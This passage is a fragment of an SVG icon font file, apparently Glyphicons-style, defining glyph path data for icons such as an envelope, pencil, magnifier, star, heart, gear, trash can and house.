<glyph unicode="&#x2709;" d="M25 1100h1150q10 0 12.5 -5t-5.5 -13l-564 -567q-8 -8 -18 -8t-18 8l-564 567q-8 8 -5.5 13t12.5 5zM18 882l264 -264q8 -8 8 -18t-8 -18l-264 -264q-8 -8 -13 -5.5t-5 12.5v550q0 10 5 12.5t13 -5.5zM918 618l264 264q8 8 13 5.5t5 -12.5v-550q0 -10 -5 -12.5t-13 5.5 l-264 264q-8 8 -8 18t8 18zM818 482l364 -364q8 -8 5.5 -13t-12.5 -5h-1150q-10 0 -12.5 5t5.5 13l364 364q8 8 18 8t18 -8l164 -164q8 -8 18 -8t18 8l164 164q8 8 18 8t18 -8z" />
<glyph unicode="&#x270f;" d="M1011 1210q19 0 33 -13l153 -153q13 -14 13 -33t-13 -33l-99 -92l-214 214l95 96q13 14 32 14zM1013 800l-615 -614l-214 214l614 614zM317 96l-333 -112l110 335z" />
<glyph unicode="&#xe001;" d="M700 650v-550h250q21 0 35.5 -14.5t14.5 -35.5v-50h-800v50q0 21 14.5 35.5t35.5 14.5h250v550l-500 550h1200z" />
<glyph unicode="&#xe002;" d="M368 1017l645 163q39 15 63 0t24 -49v-831q0 -55 -41.5 -95.5t-111.5 -63.5q-79 -25 -147 -4.5t-86 75t25.5 111.5t122.5 82q72 24 138 8v521l-600 -155v-606q0 -42 -44 -90t-109 -69q-79 -26 -147 -5.5t-86 75.5t25.5 111.5t122.5 82.5q72 24 138 7v639q0 38 14.5 59 t53.5 34z" />
<glyph unicode="&#xe003;" d="M500 1191q100 0 191 -39t156.5 -104.5t104.5 -156.5t39 -191l-1 -2l1 -5q0 -141 -78 -262l275 -274q23 -26 22.5 -44.5t-22.5 -42.5l-59 -58q-26 -20 -46.5 -20t-39.5 20l-275 274q-119 -77 -261 -77l-5 1l-2 -1q-100 0 -191 39t-156.5 104.5t-104.5 156.5t-39 191 t39 191t104.5 156.5t156.5 104.5t191 39zM500 1022q-88 0 -162 -43t-117 -117t-43 -162t43 -162t117 -117t162 -43t162 43t117 117t43 162t-43 162t-117 117t-162 43z" />
<glyph unicode="&#xe005;" d="M649 949q48 68 109.5 104t121.5 38.5t118.5 -20t102.5 -64t71 -100.5t27 -123q0 -57 -33.5 -117.5t-94 -124.5t-126.5 -127.5t-150 -152.5t-146 -174q-62 85 -145.5 174t-150 152.5t-126.5 127.5t-93.5 124.5t-33.5 117.5q0 64 28 123t73 100.5t104 64t119 20 t120.5 -38.5t104.5 -104z" />
<glyph unicode="&#xe006;" d="M407 800l131 353q7 19 17.5 19t17.5 -19l129 -353h421q21 0 24 -8.5t-14 -20.5l-342 -249l130 -401q7 -20 -0.5 -25.5t-24.5 6.5l-343 246l-342 -247q-17 -12 -24.5 -6.5t-0.5 25.5l130 400l-347 251q-17 12 -14 20.5t23 8.5h429z" />
<glyph unicode="&#xe007;" d="M407 800l131 353q7 19 17.5 19t17.5 -19l129 -353h421q21 0 24 -8.5t-14 -20.5l-342 -249l130 -401q7 -20 -0.5 -25.5t-24.5 6.5l-343 246l-342 -247q-17 -12 -24.5 -6.5t-0.5 25.5l130 400l-347 251q-17 12 -14 20.5t23 8.5h429zM477 700h-240l197 -142l-74 -226 l193 139l195 -140l-74 229l192 140h-234l-78 211z" />
<glyph unicode="&#xe008;" d="M600 1200q124 0 212 -88t88 -212v-250q0 -46 -31 -98t-69 -52v-75q0 -10 6 -21.5t15 -17.5l358 -230q9 -5 15 -16.5t6 -21.5v-93q0 -10 -7.5 -17.5t-17.5 -7.5h-1150q-10 0 -17.5 7.5t-7.5 17.5v93q0 10 6 21.5t15 16.5l358 230q9 6 15 17.5t6 21.5v75q-38 0 -69 52 t-31 98v250q0 124 88 212t212 88z" />
<glyph unicode="&#xe009;" d="M25 1100h1150q10 0 17.5 -7.5t7.5 -17.5v-1050q0 -10 -7.5 -17.5t-17.5 -7.5h-1150q-10 0 -17.5 7.5t-7.5 17.5v1050q0 10 7.5 17.5t17.5 7.5zM100 1000v-100h100v100h-100zM875 1000h-550q-10 0 -17.5 -7.5t-7.5 -17.5v-350q0 -10 7.5 -17.5t17.5 -7.5h550 q10 0 17.5 7.5t7.5 17.5v350q0 10 -7.5 17.5t-17.5 7.5zM1000 1000v-100h100v100h-100zM100 800v-100h100v100h-100zM1000 800v-100h100v100h-100zM100 600v-100h100v100h-100zM1000 600v-100h100v100h-100zM875 500h-550q-10 0 -17.5 -7.5t-7.5 -17.5v-350q0 -10 7.5 -17.5 t17.5 -7.5h550q10 0 17.5 7.5t7.5 17.5v350q0 10 -7.5 17.5t-17.5 7.5zM100 400v-100h100v100h-100zM1000 400v-100h100v100h-100zM100 200v-100h100v100h-100zM1000 200v-100h100v100h-100z" />
<glyph unicode="&#xe010;" d="M50 1100h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM650 1100h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400 q0 21 14.5 35.5t35.5 14.5zM50 500h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM650 500h400q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-400 q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe011;" d="M50 1100h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 1100h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200 q0 21 14.5 35.5t35.5 14.5zM850 1100h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM50 700h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200 q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 700h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM850 700h200q21 0 35.5 -14.5t14.5 -35.5v-200 q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM50 300h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 300h200 q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM850 300h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5 t35.5 14.5z" />
<glyph unicode="&#xe012;" d="M50 1100h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 1100h700q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5v200 q0 21 14.5 35.5t35.5 14.5zM50 700h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 700h700q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-700 q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM50 300h200q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5zM450 300h700q21 0 35.5 -14.5t14.5 -35.5v-200 q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe013;" d="M465 477l571 571q8 8 18 8t17 -8l177 -177q8 -7 8 -17t-8 -18l-783 -784q-7 -8 -17.5 -8t-17.5 8l-384 384q-8 8 -8 18t8 17l177 177q7 8 17 8t18 -8l171 -171q7 -7 18 -7t18 7z" />
<glyph unicode="&#xe014;" d="M904 1083l178 -179q8 -8 8 -18.5t-8 -17.5l-267 -268l267 -268q8 -7 8 -17.5t-8 -18.5l-178 -178q-8 -8 -18.5 -8t-17.5 8l-268 267l-268 -267q-7 -8 -17.5 -8t-18.5 8l-178 178q-8 8 -8 18.5t8 17.5l267 268l-267 268q-8 7 -8 17.5t8 18.5l178 178q8 8 18.5 8t17.5 -8 l268 -267l268 268q7 7 17.5 7t18.5 -7z" />
<glyph unicode="&#xe015;" d="M507 1177q98 0 187.5 -38.5t154.5 -103.5t103.5 -154.5t38.5 -187.5q0 -141 -78 -262l300 -299q8 -8 8 -18.5t-8 -18.5l-109 -108q-7 -8 -17.5 -8t-18.5 8l-300 299q-119 -77 -261 -77q-98 0 -188 38.5t-154.5 103t-103 154.5t-38.5 188t38.5 187.5t103 154.5 t154.5 103.5t188 38.5zM506.5 1023q-89.5 0 -165.5 -44t-120 -120.5t-44 -166t44 -165.5t120 -120t165.5 -44t166 44t120.5 120t44 165.5t-44 166t-120.5 120.5t-166 44zM425 900h150q10 0 17.5 -7.5t7.5 -17.5v-75h75q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5 t-17.5 -7.5h-75v-75q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v75h-75q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5h75v75q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe016;" d="M507 1177q98 0 187.5 -38.5t154.5 -103.5t103.5 -154.5t38.5 -187.5q0 -141 -78 -262l300 -299q8 -8 8 -18.5t-8 -18.5l-109 -108q-7 -8 -17.5 -8t-18.5 8l-300 299q-119 -77 -261 -77q-98 0 -188 38.5t-154.5 103t-103 154.5t-38.5 188t38.5 187.5t103 154.5 t154.5 103.5t188 38.5zM506.5 1023q-89.5 0 -165.5 -44t-120 -120.5t-44 -166t44 -165.5t120 -120t165.5 -44t166 44t120.5 120t44 165.5t-44 166t-120.5 120.5t-166 44zM325 800h350q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-350q-10 0 -17.5 7.5 t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe017;" d="M550 1200h100q21 0 35.5 -14.5t14.5 -35.5v-400q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v400q0 21 14.5 35.5t35.5 14.5zM800 975v166q167 -62 272 -209.5t105 -331.5q0 -117 -45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5 t-184.5 123t-123 184.5t-45.5 224q0 184 105 331.5t272 209.5v-166q-103 -55 -165 -155t-62 -220q0 -116 57 -214.5t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5q0 120 -62 220t-165 155z" />
<glyph unicode="&#xe018;" d="M1025 1200h150q10 0 17.5 -7.5t7.5 -17.5v-1150q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v1150q0 10 7.5 17.5t17.5 7.5zM725 800h150q10 0 17.5 -7.5t7.5 -17.5v-750q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v750 q0 10 7.5 17.5t17.5 7.5zM425 500h150q10 0 17.5 -7.5t7.5 -17.5v-450q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v450q0 10 7.5 17.5t17.5 7.5zM125 300h150q10 0 17.5 -7.5t7.5 -17.5v-250q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5 v250q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe019;" d="M600 1174q33 0 74 -5l38 -152l5 -1q49 -14 94 -39l5 -2l134 80q61 -48 104 -105l-80 -134l3 -5q25 -44 39 -93l1 -6l152 -38q5 -43 5 -73q0 -34 -5 -74l-152 -38l-1 -6q-15 -49 -39 -93l-3 -5l80 -134q-48 -61 -104 -105l-134 81l-5 -3q-44 -25 -94 -39l-5 -2l-38 -151 q-43 -5 -74 -5q-33 0 -74 5l-38 151l-5 2q-49 14 -94 39l-5 3l-134 -81q-60 48 -104 105l80 134l-3 5q-25 45 -38 93l-2 6l-151 38q-6 42 -6 74q0 33 6 73l151 38l2 6q13 48 38 93l3 5l-80 134q47 61 105 105l133 -80l5 2q45 25 94 39l5 1l38 152q43 5 74 5zM600 815 q-89 0 -152 -63t-63 -151.5t63 -151.5t152 -63t152 63t63 151.5t-63 151.5t-152 63z" />
<glyph unicode="&#xe020;" d="M500 1300h300q41 0 70.5 -29.5t29.5 -70.5v-100h275q10 0 17.5 -7.5t7.5 -17.5v-75h-1100v75q0 10 7.5 17.5t17.5 7.5h275v100q0 41 29.5 70.5t70.5 29.5zM500 1200v-100h300v100h-300zM1100 900v-800q0 -41 -29.5 -70.5t-70.5 -29.5h-700q-41 0 -70.5 29.5t-29.5 70.5 v800h900zM300 800v-700h100v700h-100zM500 800v-700h100v700h-100zM700 800v-700h100v700h-100zM900 800v-700h100v700h-100z" />
<glyph unicode="&#xe021;" d="M18 618l620 608q8 7 18.5 7t17.5 -7l608 -608q8 -8 5.5 -13t-12.5 -5h-175v-575q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v375h-300v-375q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v575h-175q-10 0 -12.5 5t5.5 13z" />
<glyph unicode="&#xe022;" d="M600 1200v-400q0 -41 29.5 -70.5t70.5 -29.5h300v-650q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v1100q0 21 14.5 35.5t35.5 14.5h450zM1000 800h-250q-21 0 -35.5 14.5t-14.5 35.5v250z" />
<glyph unicode="&#xe023;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM525 900h50q10 0 17.5 -7.5t7.5 -17.5v-275h175q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-250q-10 0 -17.5 7.5t-7.5 17.5v350q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe024;" d="M1300 0h-538l-41 400h-242l-41 -400h-538l431 1200h209l-21 -300h162l-20 300h208zM515 800l-27 -300h224l-27 300h-170z" />
<glyph unicode="&#xe025;" d="M550 1200h200q21 0 35.5 -14.5t14.5 -35.5v-450h191q20 0 25.5 -11.5t-7.5 -27.5l-327 -400q-13 -16 -32 -16t-32 16l-327 400q-13 16 -7.5 27.5t25.5 11.5h191v450q0 21 14.5 35.5t35.5 14.5zM1125 400h50q10 0 17.5 -7.5t7.5 -17.5v-350q0 -10 -7.5 -17.5t-17.5 -7.5 h-1050q-10 0 -17.5 7.5t-7.5 17.5v350q0 10 7.5 17.5t17.5 7.5h50q10 0 17.5 -7.5t7.5 -17.5v-175h900v175q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe026;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM525 900h150q10 0 17.5 -7.5t7.5 -17.5v-275h137q21 0 26 -11.5t-8 -27.5l-223 -275q-13 -16 -32 -16t-32 16l-223 275q-13 16 -8 27.5t26 11.5h137v275q0 10 7.5 17.5t17.5 7.5z " />
<glyph unicode="&#xe027;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM632 914l223 -275q13 -16 8 -27.5t-26 -11.5h-137v-275q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v275h-137q-21 0 -26 11.5t8 27.5l223 275q13 16 32 16 t32 -16z" />
<glyph unicode="&#xe028;" d="M225 1200h750q10 0 19.5 -7t12.5 -17l186 -652q7 -24 7 -49v-425q0 -12 -4 -27t-9 -17q-12 -6 -37 -6h-1100q-12 0 -27 4t-17 8q-6 13 -6 38l1 425q0 25 7 49l185 652q3 10 12.5 17t19.5 7zM878 1000h-556q-10 0 -19 -7t-11 -18l-87 -450q-2 -11 4 -18t16 -7h150 q10 0 19.5 -7t11.5 -17l38 -152q2 -10 11.5 -17t19.5 -7h250q10 0 19.5 7t11.5 17l38 152q2 10 11.5 17t19.5 7h150q10 0 16 7t4 18l-87 450q-2 11 -11 18t-19 7z" />
<glyph unicode="&#xe029;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM540 820l253 -190q17 -12 17 -30t-17 -30l-253 -190q-16 -12 -28 -6.5t-12 26.5v400q0 21 12 26.5t28 -6.5z" />
<glyph unicode="&#xe030;" d="M947 1060l135 135q7 7 12.5 5t5.5 -13v-362q0 -10 -7.5 -17.5t-17.5 -7.5h-362q-11 0 -13 5.5t5 12.5l133 133q-109 76 -238 76q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5h150q0 -117 -45.5 -224 t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5q192 0 347 -117z" />
<glyph unicode="&#xe031;" d="M947 1060l135 135q7 7 12.5 5t5.5 -13v-361q0 -11 -7.5 -18.5t-18.5 -7.5h-361q-11 0 -13 5.5t5 12.5l134 134q-110 75 -239 75q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5h-150q0 117 45.5 224t123 184.5t184.5 123t224 45.5q192 0 347 -117zM1027 600h150 q0 -117 -45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5q-192 0 -348 118l-134 -134q-7 -8 -12.5 -5.5t-5.5 12.5v360q0 11 7.5 18.5t18.5 7.5h360q10 0 12.5 -5.5t-5.5 -12.5l-133 -133q110 -76 240 -76q116 0 214.5 57t155.5 155.5t57 214.5z" />
<glyph unicode="&#xe032;" d="M125 1200h1050q10 0 17.5 -7.5t7.5 -17.5v-1150q0 -10 -7.5 -17.5t-17.5 -7.5h-1050q-10 0 -17.5 7.5t-7.5 17.5v1150q0 10 7.5 17.5t17.5 7.5zM1075 1000h-850q-10 0 -17.5 -7.5t-7.5 -17.5v-850q0 -10 7.5 -17.5t17.5 -7.5h850q10 0 17.5 7.5t7.5 17.5v850 q0 10 -7.5 17.5t-17.5 7.5zM325 900h50q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5zM525 900h450q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-450q-10 0 -17.5 7.5t-7.5 17.5v50 q0 10 7.5 17.5t17.5 7.5zM325 700h50q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5zM525 700h450q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-450q-10 0 -17.5 7.5t-7.5 17.5v50 q0 10 7.5 17.5t17.5 7.5zM325 500h50q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5zM525 500h450q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-450q-10 0 -17.5 7.5t-7.5 17.5v50 q0 10 7.5 17.5t17.5 7.5zM325 300h50q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v50q0 10 7.5 17.5t17.5 7.5zM525 300h450q10 0 17.5 -7.5t7.5 -17.5v-50q0 -10 -7.5 -17.5t-17.5 -7.5h-450q-10 0 -17.5 7.5t-7.5 17.5v50 q0 10 7.5 17.5t17.5 7.5z" />
<glyph unicode="&#xe033;" d="M900 800v200q0 83 -58.5 141.5t-141.5 58.5h-300q-82 0 -141 -59t-59 -141v-200h-100q-41 0 -70.5 -29.5t-29.5 -70.5v-600q0 -41 29.5 -70.5t70.5 -29.5h900q41 0 70.5 29.5t29.5 70.5v600q0 41 -29.5 70.5t-70.5 29.5h-100zM400 800v150q0 21 15 35.5t35 14.5h200 q20 0 35 -14.5t15 -35.5v-150h-300z" />
<glyph unicode="&#xe034;" d="M125 1100h50q10 0 17.5 -7.5t7.5 -17.5v-1075h-100v1075q0 10 7.5 17.5t17.5 7.5zM1075 1052q4 0 9 -2q16 -6 16 -23v-421q0 -6 -3 -12q-33 -59 -66.5 -99t-65.5 -58t-56.5 -24.5t-52.5 -6.5q-26 0 -57.5 6.5t-52.5 13.5t-60 21q-41 15 -63 22.5t-57.5 15t-65.5 7.5 q-85 0 -160 -57q-7 -5 -15 -5q-6 0 -11 3q-14 7 -14 22v438q22 55 82 98.5t119 46.5q23 2 43 0.5t43 -7t32.5 -8.5t38 -13t32.5 -11q41 -14 63.5 -21t57 -14t63.5 -7q103 0 183 87q7 8 18 8z" />
<glyph unicode="&#xe035;" d="M600 1175q116 0 227 -49.5t192.5 -131t131 -192.5t49.5 -227v-300q0 -10 -7.5 -17.5t-17.5 -7.5h-50q-10 0 -17.5 7.5t-7.5 17.5v300q0 127 -70.5 231.5t-184.5 161.5t-245 57t-245 -57t-184.5 -161.5t-70.5 -231.5v-300q0 -10 -7.5 -17.5t-17.5 -7.5h-50 q-10 0 -17.5 7.5t-7.5 17.5v300q0 116 49.5 227t131 192.5t192.5 131t227 49.5zM220 500h160q8 0 14 -6t6 -14v-460q0 -8 -6 -14t-14 -6h-160q-8 0 -14 6t-6 14v460q0 8 6 14t14 6zM820 500h160q8 0 14 -6t6 -14v-460q0 -8 -6 -14t-14 -6h-160q-8 0 -14 6t-6 14v460 q0 8 6 14t14 6z" />
<glyph unicode="&#xe036;" d="M321 814l258 172q9 6 15 2.5t6 -13.5v-750q0 -10 -6 -13.5t-15 2.5l-258 172q-21 14 -46 14h-250q-10 0 -17.5 7.5t-7.5 17.5v350q0 10 7.5 17.5t17.5 7.5h250q25 0 46 14zM900 668l120 120q7 7 17 7t17 -7l34 -34q7 -7 7 -17t-7 -17l-120 -120l120 -120q7 -7 7 -17 t-7 -17l-34 -34q-7 -7 -17 -7t-17 7l-120 119l-120 -119q-7 -7 -17 -7t-17 7l-34 34q-7 7 -7 17t7 17l119 120l-119 120q-7 7 -7 17t7 17l34 34q7 8 17 8t17 -8z" />
<glyph unicode="&#xe037;" d="M321 814l258 172q9 6 15 2.5t6 -13.5v-750q0 -10 -6 -13.5t-15 2.5l-258 172q-21 14 -46 14h-250q-10 0 -17.5 7.5t-7.5 17.5v350q0 10 7.5 17.5t17.5 7.5h250q25 0 46 14zM766 900h4q10 -1 16 -10q96 -129 96 -290q0 -154 -90 -281q-6 -9 -17 -10l-3 -1q-9 0 -16 6 l-29 23q-7 7 -8.5 16.5t4.5 17.5q72 103 72 229q0 132 -78 238q-6 8 -4.5 18t9.5 17l29 22q7 5 15 5z" />
<glyph unicode="&#xe038;" d="M967 1004h3q11 -1 17 -10q135 -179 135 -396q0 -105 -34 -206.5t-98 -185.5q-7 -9 -17 -10h-3q-9 0 -16 6l-42 34q-8 6 -9 16t5 18q111 150 111 328q0 90 -29.5 176t-84.5 157q-6 9 -5 19t10 16l42 33q7 5 15 5zM321 814l258 172q9 6 15 2.5t6 -13.5v-750q0 -10 -6 -13.5 t-15 2.5l-258 172q-21 14 -46 14h-250q-10 0 -17.5 7.5t-7.5 17.5v350q0 10 7.5 17.5t17.5 7.5h250q25 0 46 14zM766 900h4q10 -1 16 -10q96 -129 96 -290q0 -154 -90 -281q-6 -9 -17 -10l-3 -1q-9 0 -16 6l-29 23q-7 7 -8.5 16.5t4.5 17.5q72 103 72 229q0 132 -78 238 q-6 8 -4.5 18.5t9.5 16.5l29 22q7 5 15 5z" />
<glyph unicode="&#xe039;" d="M500 900h100v-100h-100v-100h-400v-100h-100v600h500v-300zM1200 700h-200v-100h200v-200h-300v300h-200v300h-100v200h600v-500zM100 1100v-300h300v300h-300zM800 1100v-300h300v300h-300zM300 900h-100v100h100v-100zM1000 900h-100v100h100v-100zM300 500h200v-500 h-500v500h200v100h100v-100zM800 300h200v-100h-100v-100h-200v100h-100v100h100v200h-200v100h300v-300zM100 400v-300h300v300h-300zM300 200h-100v100h100v-100zM1200 200h-100v100h100v-100zM700 0h-100v100h100v-100zM1200 0h-300v100h300v-100z" />
<glyph unicode="&#xe040;" d="M100 200h-100v1000h100v-1000zM300 200h-100v1000h100v-1000zM700 200h-200v1000h200v-1000zM900 200h-100v1000h100v-1000zM1200 200h-200v1000h200v-1000zM400 0h-300v100h300v-100zM600 0h-100v91h100v-91zM800 0h-100v91h100v-91zM1100 0h-200v91h200v-91z" />
<glyph unicode="&#xe041;" d="M500 1200l682 -682q8 -8 8 -18t-8 -18l-464 -464q-8 -8 -18 -8t-18 8l-682 682l1 475q0 10 7.5 17.5t17.5 7.5h474zM319.5 1024.5q-29.5 29.5 -71 29.5t-71 -29.5t-29.5 -71.5t29.5 -71.5t71 -29.5t71 29.5t29.5 71.5t-29.5 71.5z" />
<glyph unicode="&#xe042;" d="M500 1200l682 -682q8 -8 8 -18t-8 -18l-464 -464q-8 -8 -18 -8t-18 8l-682 682l1 475q0 10 7.5 17.5t17.5 7.5h474zM800 1200l682 -682q8 -8 8 -18t-8 -18l-464 -464q-8 -8 -18 -8t-18 8l-56 56l424 426l-700 700h150zM319.5 1024.5q-29.5 29.5 -71 29.5t-71 -29.5 t-29.5 -71.5t29.5 -71.5t71 -29.5t71 29.5t29.5 71.5t-29.5 71.5z" />
<glyph unicode="&#xe043;" d="M300 1200h825q75 0 75 -75v-900q0 -25 -18 -43l-64 -64q-8 -8 -13 -5.5t-5 12.5v950q0 10 -7.5 17.5t-17.5 7.5h-700q-25 0 -43 -18l-64 -64q-8 -8 -5.5 -13t12.5 -5h700q10 0 17.5 -7.5t7.5 -17.5v-950q0 -10 -7.5 -17.5t-17.5 -7.5h-850q-10 0 -17.5 7.5t-7.5 17.5v975 q0 25 18 43l139 139q18 18 43 18z" />
<glyph unicode="&#xe044;" d="M250 1200h800q21 0 35.5 -14.5t14.5 -35.5v-1150l-450 444l-450 -445v1151q0 21 14.5 35.5t35.5 14.5z" />
